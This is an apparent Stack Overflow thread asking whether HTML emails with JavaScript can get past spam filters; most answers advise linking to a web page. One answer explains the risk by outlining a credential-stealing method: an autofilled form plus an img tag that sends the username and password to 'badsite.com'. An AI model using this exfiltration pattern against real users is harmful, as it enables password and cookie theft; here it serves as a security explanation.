views:

519

answers:

4

This is mostly a rhetorical question, as far as I've checked the answer is 'don't even bother', but I wanted to be really sure.

We have an email app, where you can send email to lists of subscribers. This is not spam: it's used, for example, by an university to send communications to its students, by a museum to send emails to subscribers, etc.

Recently, I was asked by a prospective client if it was possible to send html messages containing javascript without being marked as spam.

Not knowing, I did a short trip of the webs and what I've got is (percentages out of my posterior) 'half the clients won't display properly', 'half the clients will flag you as spam' and 'half the clients will have blocked javascript altogether' (There's clearly some superposition).

So the best solution seems to be adding a link to a proper page if really necessary. Have you got a different experience? Do you know of any email-merge solution that provides this feature? Do you know if specific clients accept it or refuse to display html with javascript?

+6  A: 

You have listed the right arguments against javascript usage in emails. These show you that it is a bad idea. Linking to a page where you can use javascript freely is a good option and lets the user decide if and when he wants to access this "enhanced" content.

Sebastian Dietz
exactly, let the user decide, give the subscribers the option of receiving a text-only version or the javascript heavy version.
yx
agree. the reasons you listed are great, so tell them "no" or "theoretically, yes, but it's the worst idea in the world, here's why...".
jacobangel
A: 

The problem of JavaScript is that it poses a security threat. If there is any email client that accepts it, then it's most likely a security vulnerability and should be fixed.

So, really, "don't even bother", because even if it works, it'll soon stop working.

EDIT: Some people don't seem to understand why it is a security risk, so I'll explain.

Consider the following code(one of the multiple ways to steal passwords using Javascript and unsafe email clients).

Using JavaScript:

  1. Create a form with "username" and "password" input fields.
  2. Let the browser automatically remember the content of these fields(several users store username and password in the browser's memory to avoid having to type and remember it every time.
  3. Once both fields are (automatically) filled, send their content to your website using something like <img src="badsite.com/senddata?username=user&password=pass">.
  4. Congratulations! You've stolen a password!

Usually, just creating a form using JavaScript in your own unsafe website isn't harmful by itself because the browser is smart enough to tell gmail data only to gmail(and you usually don't try to steal passwords from your own website, and in that case there'd be easier ways to steal them anyway).

However, if you allowed JavaScript in emails, then the browser wouldn't be capable of separating legitimate JavaScript from insecure code.

Cookie theft is also possible if an email client can't filter JavaScript.

luiscubal
Not necessarily. It's no vulnerability having Javascript in browsers, why should it be in emails?
Georg
Because JavaScript in emails would be able to get the email cookies for passwords for example and send it to a different site.
luiscubal
A: 

With spam being such a big deal I would stick to sending out basic emails that are easily consumable. You can always link to a webpage which has your javascript in it. You can also send a querystring parameter in the URL to track the users who are most interested in your emails because this will tell you they are click into them. So while it may be possible, its probably best to avoid it.

Bob
A: 

yeah it is possible but not recommended. for security purpose most of all Mail management software blocked js or give alert if he include js. if user strict for spam then these mail also goes to spam.

4thpage